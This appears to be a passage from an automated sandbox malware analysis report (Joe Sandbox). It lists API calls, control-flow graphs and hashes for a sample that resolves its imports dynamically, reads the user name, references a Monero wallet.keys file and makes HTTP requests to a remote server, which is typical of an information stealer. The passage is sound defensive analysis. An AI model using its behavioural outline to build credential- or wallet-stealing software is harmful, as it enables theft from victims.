                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00084ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000A0DDB,00000000,?,?,00000000,?,",00000000,?,00D3FC40), ref: 00084DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00084E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00084E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00084E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00084EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00084EC5
                                    • HttpOpenRequestA.WININET(00000000,00D3FC80,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00084B15
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00084ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                    • Instruction ID: 4c18cf2490dd39e7c8b13e000ce1ed5bf9e26f55d42465214fb459e36855241e
                                    • Opcode Fuzzy Hash: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                    • Instruction Fuzzy Hash: 5312CF71A20118AADF15EB90DC96FEEB379BF16300F504199B10676092EF702F49DFA2
                                    Function 00097850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                    • Instruction ID: a8bae039c7c2b01d4bbbdb59434ce0e10438c5f3eea8fc606210a8fa597c2efc
                                    • Opcode Fuzzy Hash: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                    • Instruction Fuzzy Hash: 19F04FB1944208EBCB10DF99ED4AFAEFBB8FB04715F10025AFA05A2680C77815048BA1
                                    Function 00081160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                    • Instruction ID: 416f94bce9d38f5526209010d0599e43a6356f42bdb776f5bc85f33f1fdb1f7f
                                    • Opcode Fuzzy Hash: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                    • Instruction Fuzzy Hash: F5D09E7490430CDBCB04EFE0ED8DADDBB78FB08715F101555D90562340EA315596CBA6
                                    Function 00099C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 99c10-99c1a 634 99c20-9a031 GetProcAddress * 43 633->634 635 9a036-9a0ca LoadLibraryA * 8 633->635 634->635 636 9a0cc-9a141 GetProcAddress * 5 635->636 637 9a146-9a14d 635->637 636->637 638 9a153-9a211 GetProcAddress * 8 637->638 639 9a216-9a21d 637->639 638->639 640 9a298-9a29f 639->640 641 9a21f-9a293 GetProcAddress * 5 639->641 642 9a2a5-9a332 GetProcAddress * 6 640->642 643 9a337-9a33e 640->643 641->640 642->643 644 9a41f-9a426 643->644 645 9a344-9a41a GetProcAddress * 9 643->645 646 9a428-9a49d GetProcAddress * 5 644->646 647 9a4a2-9a4a9 644->647 645->644 646->647 648 9a4ab-9a4d7 GetProcAddress * 2 647->648 649 9a4dc-9a4e3 647->649 648->649 650 9a515-9a51c 649->650 651 9a4e5-9a510 GetProcAddress * 2 649->651 652 9a612-9a619 650->652 653 9a522-9a60d GetProcAddress * 10 650->653 651->650 654 9a61b-9a678 GetProcAddress * 4 652->654 655 9a67d-9a684 652->655 653->652 654->655 656 9a69e-9a6a5 655->656 657 9a686-9a699 GetProcAddress 655->657 658 9a708-9a709 656->658 659 9a6a7-9a703 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00D25268), ref: 00099C2D
                                    • GetProcAddress.KERNEL32(76210000,00D24F48), ref: 00099C45
                                    • GetProcAddress.KERNEL32(76210000,00D38E78), ref: 00099C5E
                                    • GetProcAddress.KERNEL32(76210000,00D38E18), ref: 00099C76
                                    • GetProcAddress.KERNEL32(76210000,00D38EF0), ref: 00099C8E
                                    • GetProcAddress.KERNEL32(76210000,00D3DA18), ref: 00099CA7
                                    • GetProcAddress.KERNEL32(76210000,00D2A6D0), ref: 00099CBF
                                    • GetProcAddress.KERNEL32(76210000,00D3D820), ref: 00099CD7
                                    • GetProcAddress.KERNEL32(76210000,00D3DA90), ref: 00099CF0
                                    • GetProcAddress.KERNEL32(76210000,00D3DA60), ref: 00099D08
                                    • GetProcAddress.KERNEL32(76210000,00D3D808), ref: 00099D20
                                    • GetProcAddress.KERNEL32(76210000,00D252A8), ref: 00099D39
                                    • GetProcAddress.KERNEL32(76210000,00D25008), ref: 00099D51
                                    • GetProcAddress.KERNEL32(76210000,00D252E8), ref: 00099D69
                                    • GetProcAddress.KERNEL32(76210000,00D25168), ref: 00099D82
                                    • GetProcAddress.KERNEL32(76210000,00D3D868), ref: 00099D9A
                                    • GetProcAddress.KERNEL32(76210000,00D3D9D0), ref: 00099DB2
                                    • GetProcAddress.KERNEL32(76210000,00D2A658), ref: 00099DCB
                                    • GetProcAddress.KERNEL32(76210000,00D25108), ref: 00099DE3
                                    • GetProcAddress.KERNEL32(76210000,00D3DA30), ref: 00099DFB
                                    • GetProcAddress.KERNEL32(76210000,00D3D940), ref: 00099E14
                                    • GetProcAddress.KERNEL32(76210000,00D3D838), ref: 00099E2C
                                    • GetProcAddress.KERNEL32(76210000,00D3D8C8), ref: 00099E44
                                    • GetProcAddress.KERNEL32(76210000,00D251E8), ref: 00099E5D
                                    • GetProcAddress.KERNEL32(76210000,00D3D850), ref: 00099E75
                                    • GetProcAddress.KERNEL32(76210000,00D3D970), ref: 00099E8D
                                    • GetProcAddress.KERNEL32(76210000,00D3D898), ref: 00099EA6
                                    • GetProcAddress.KERNEL32(76210000,00D3D7F0), ref: 00099EBE
                                    • GetProcAddress.KERNEL32(76210000,00D3D880), ref: 00099ED6
                                    • GetProcAddress.KERNEL32(76210000,00D3D7C0), ref: 00099EEF
                                    • GetProcAddress.KERNEL32(76210000,00D3D7D8), ref: 00099F07
                                    • GetProcAddress.KERNEL32(76210000,00D3D8B0), ref: 00099F1F
                                    • GetProcAddress.KERNEL32(76210000,00D3D9E8), ref: 00099F38
                                    • GetProcAddress.KERNEL32(76210000,00D2FB98), ref: 00099F50
                                    • GetProcAddress.KERNEL32(76210000,00D3DAA8), ref: 00099F68
                                    • GetProcAddress.KERNEL32(76210000,00D3D928), ref: 00099F81
                                    • GetProcAddress.KERNEL32(76210000,00D25188), ref: 00099F99
                                    • GetProcAddress.KERNEL32(76210000,00D3D8E0), ref: 00099FB1
                                    • GetProcAddress.KERNEL32(76210000,00D251A8), ref: 00099FCA
                                    • GetProcAddress.KERNEL32(76210000,00D3DA00), ref: 00099FE2
                                    • GetProcAddress.KERNEL32(76210000,00D3D958), ref: 00099FFA
                                    • GetProcAddress.KERNEL32(76210000,00D24F68), ref: 0009A013
                                    • GetProcAddress.KERNEL32(76210000,00D251C8), ref: 0009A02B
                                    • LoadLibraryA.KERNEL32(00D3DA78,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A03D
                                    • LoadLibraryA.KERNEL32(00D3D8F8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A04E
                                    • LoadLibraryA.KERNEL32(00D3D910,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A060
                                    • LoadLibraryA.KERNEL32(00D3DA48,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A072
                                    • LoadLibraryA.KERNEL32(00D3D988,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A083
                                    • LoadLibraryA.KERNEL32(00D3D9A0,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A095
                                    • LoadLibraryA.KERNEL32(00D3D9B8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0A7
                                    • LoadLibraryA.KERNEL32(00D3DC10,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0B8
                                    • GetProcAddress.KERNEL32(751E0000,00D25308), ref: 0009A0DA
                                    • GetProcAddress.KERNEL32(751E0000,00D3DB38), ref: 0009A0F2
                                    • GetProcAddress.KERNEL32(751E0000,00D38B68), ref: 0009A10A
                                    • GetProcAddress.KERNEL32(751E0000,00D3DD90), ref: 0009A123
                                    • GetProcAddress.KERNEL32(751E0000,00D25208), ref: 0009A13B
                                    • GetProcAddress.KERNEL32(700F0000,00D2A6F8), ref: 0009A160
                                    • GetProcAddress.KERNEL32(700F0000,00D253A8), ref: 0009A179
                                    • GetProcAddress.KERNEL32(700F0000,00D2A4F0), ref: 0009A191
                                    • GetProcAddress.KERNEL32(700F0000,00D3DAD8), ref: 0009A1A9
                                    • GetProcAddress.KERNEL32(700F0000,00D3DD00), ref: 0009A1C2
                                    • GetProcAddress.KERNEL32(700F0000,00D25688), ref: 0009A1DA
                                    • GetProcAddress.KERNEL32(700F0000,00D256A8), ref: 0009A1F2
                                    • GetProcAddress.KERNEL32(700F0000,00D3DBB0), ref: 0009A20B
                                    • GetProcAddress.KERNEL32(753A0000,00D254C8), ref: 0009A22C
                                    • GetProcAddress.KERNEL32(753A0000,00D25668), ref: 0009A244
                                    • GetProcAddress.KERNEL32(753A0000,00D3DB08), ref: 0009A25D
                                    • GetProcAddress.KERNEL32(753A0000,00D3DB50), ref: 0009A275
                                    • GetProcAddress.KERNEL32(753A0000,00D253E8), ref: 0009A28D
                                    • GetProcAddress.KERNEL32(76310000,00D2A7E8), ref: 0009A2B3
                                    • GetProcAddress.KERNEL32(76310000,00D2A8B0), ref: 0009A2CB
                                    • GetProcAddress.KERNEL32(76310000,00D3DB68), ref: 0009A2E3
                                    • GetProcAddress.KERNEL32(76310000,00D25448), ref: 0009A2FC
                                    • GetProcAddress.KERNEL32(76310000,00D25508), ref: 0009A314
                                    • GetProcAddress.KERNEL32(76310000,00D2A900), ref: 0009A32C
                                    • GetProcAddress.KERNEL32(76910000,00D3DB20), ref: 0009A352
                                    • GetProcAddress.KERNEL32(76910000,00D25388), ref: 0009A36A
                                    • GetProcAddress.KERNEL32(76910000,00D38BC8), ref: 0009A382
                                    • GetProcAddress.KERNEL32(76910000,00D3DC88), ref: 0009A39B
                                    • GetProcAddress.KERNEL32(76910000,00D3DD78), ref: 0009A3B3
                                    • GetProcAddress.KERNEL32(76910000,00D25528), ref: 0009A3CB
                                    • GetProcAddress.KERNEL32(76910000,00D25468), ref: 0009A3E4
                                    • GetProcAddress.KERNEL32(76910000,00D3DCE8), ref: 0009A3FC
                                    • GetProcAddress.KERNEL32(76910000,00D3DAF0), ref: 0009A414
                                    • GetProcAddress.KERNEL32(75B30000,00D25608), ref: 0009A436
                                    • GetProcAddress.KERNEL32(75B30000,00D3DD30), ref: 0009A44E
                                    • GetProcAddress.KERNEL32(75B30000,00D3DC28), ref: 0009A466
                                    • GetProcAddress.KERNEL32(75B30000,00D3DB80), ref: 0009A47F
                                    • GetProcAddress.KERNEL32(75B30000,00D3DC70), ref: 0009A497
                                    • GetProcAddress.KERNEL32(75670000,00D255C8), ref: 0009A4B8
                                    • GetProcAddress.KERNEL32(75670000,00D25348), ref: 0009A4D1
                                    • GetProcAddress.KERNEL32(76AC0000,00D25408), ref: 0009A4F2
                                    • GetProcAddress.KERNEL32(76AC0000,00D3DB98), ref: 0009A50A
                                    • GetProcAddress.KERNEL32(6F4E0000,00D25488), ref: 0009A530
                                    • GetProcAddress.KERNEL32(6F4E0000,00D256C8), ref: 0009A548
                                    • GetProcAddress.KERNEL32(6F4E0000,00D256E8), ref: 0009A560
                                    • GetProcAddress.KERNEL32(6F4E0000,00D3DBC8), ref: 0009A579
                                    • GetProcAddress.KERNEL32(6F4E0000,00D25368), ref: 0009A591
                                    • GetProcAddress.KERNEL32(6F4E0000,00D254A8), ref: 0009A5A9
                                    • GetProcAddress.KERNEL32(6F4E0000,00D253C8), ref: 0009A5C2
                                    • GetProcAddress.KERNEL32(6F4E0000,00D25428), ref: 0009A5DA
                                    • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0009A5F1
                                    • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0009A607
                                    • GetProcAddress.KERNEL32(75AE0000,00D3DCA0), ref: 0009A629
                                    • GetProcAddress.KERNEL32(75AE0000,00D38B78), ref: 0009A641
                                    • GetProcAddress.KERNEL32(75AE0000,00D3DC58), ref: 0009A659
                                    • GetProcAddress.KERNEL32(75AE0000,00D3DD60), ref: 0009A672
                                    • GetProcAddress.KERNEL32(76300000,00D254E8), ref: 0009A693
                                    • GetProcAddress.KERNEL32(6FE40000,00D3DBE0), ref: 0009A6B4
                                    • GetProcAddress.KERNEL32(6FE40000,00D25548), ref: 0009A6CD
                                    • GetProcAddress.KERNEL32(6FE40000,00D3DD48), ref: 0009A6E5
                                    • GetProcAddress.KERNEL32(6FE40000,00D3DCB8), ref: 0009A6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                    • Instruction ID: 78bf24dfea621ae367f77698703bb4e81ba6fc1d1631229e38bf19e7ff023af7
                                    • Opcode Fuzzy Hash: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                    • Instruction Fuzzy Hash: 62627EB5601288AFC344DFA8FD8CD6AB7F9F78C309314861AA609C7234D7399859DF52
                                    Function 00086280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 86280-8630b call 9a7a0 call 847b0 call 9a740 InternetOpenA StrCmpCA 1040 8630d 1033->1040 1041 86314-86318 1033->1041 1040->1041 1042 86509-86525 call 9a7a0 call 9a800 * 2 1041->1042 1043 8631e-86342 InternetConnectA 1041->1043 1062 86528-8652d 1042->1062 1044 86348-8634c 1043->1044 1045 864ff-86503 InternetCloseHandle 1043->1045 1047 8635a 1044->1047 1048 8634e-86358 1044->1048 1045->1042 1050 86364-86392 HttpOpenRequestA 1047->1050 1048->1050 1052 86398-8639c 1050->1052 1053 864f5-864f9 InternetCloseHandle 1050->1053 1055 8639e-863bf InternetSetOptionA 1052->1055 1056 863c5-86405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 8642c-8644b call 98940 1056->1058 1059 86407-86427 call 9a740 call 9a800 * 2 1056->1059 1066 864c9-864e9 call 9a740 call 9a800 * 2 1058->1066 1067 8644d-86454 1058->1067 1059->1062 1066->1062 1069 86456-86480 InternetReadFile 1067->1069 1070 864c7-864ef InternetCloseHandle 1067->1070 1073 8648b 1069->1073 1074 86482-86489 1069->1074 1070->1053 1073->1070 1074->1073 1079 8648d-864c5 call 9a9b0 call 9a8a0 call 9a800 1074->1079 1079->1069
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00086385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000863FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0008646D
                                    • InternetCloseHandle.WININET(00000000), ref: 000864EF
                                    • InternetCloseHandle.WININET(00000000), ref: 000864F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00086503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                    • Instruction ID: 41455f1b72bcb1ff831e1698f0a75cfab96611eb94c8e9beec5bf36a60018942
                                    • Opcode Fuzzy Hash: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                    • Instruction Fuzzy Hash: DA715071A00218ABDF24EFA0DC49FEEB7B4FB45704F108158F10A6B191DBB56A89DF91
                                    Function 00095510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 95510-95577 call 95ad0 call 9a820 * 3 call 9a740 * 4 1106 9557c-95583 1090->1106 1107 95585-955b6 call 9a820 call 9a7a0 call 81590 call 951f0 1106->1107 1108 955d7-9564c call 9a740 * 2 call 81590 call 952c0 call 9a8a0 call 9a800 call 9aad0 StrCmpCA 1106->1108 1124 955bb-955d2 call 9a8a0 call 9a800 1107->1124 1134 95693-956a9 call 9aad0 StrCmpCA 1108->1134 1138 9564e-9568e call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1108->1138 1124->1134 1139 957dc-95844 call 9a8a0 call 9a820 * 2 call 81670 call 9a800 * 4 call 96560 call 81550 1134->1139 1140 956af-956b6 1134->1140 1138->1134 1270 95ac3-95ac6 1139->1270 1143 957da-9585f call 9aad0 StrCmpCA 1140->1143 1144 956bc-956c3 1140->1144 1163 95991-959f9 call 9a8a0 call 9a820 * 2 call 81670 call 9a800 * 4 call 96560 call 81550 1143->1163 1164 95865-9586c 1143->1164 1148 9571e-95793 call 9a740 * 2 call 81590 call 952c0 call 9a8a0 call 9a800 call 9aad0 StrCmpCA 1144->1148 1149 956c5-95719 call 9a820 call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1144->1149 1148->1143 1249 95795-957d5 call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1148->1249 1149->1143 1163->1270 1170 9598f-95a14 call 9aad0 StrCmpCA 1164->1170 1171 95872-95879 1164->1171 1199 95a28-95a91 call 9a8a0 call 9a820 * 2 call 81670 call 9a800 * 4 call 96560 call 81550 1170->1199 1200 95a16-95a21 Sleep 1170->1200 1178 9587b-958ce call 9a820 call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 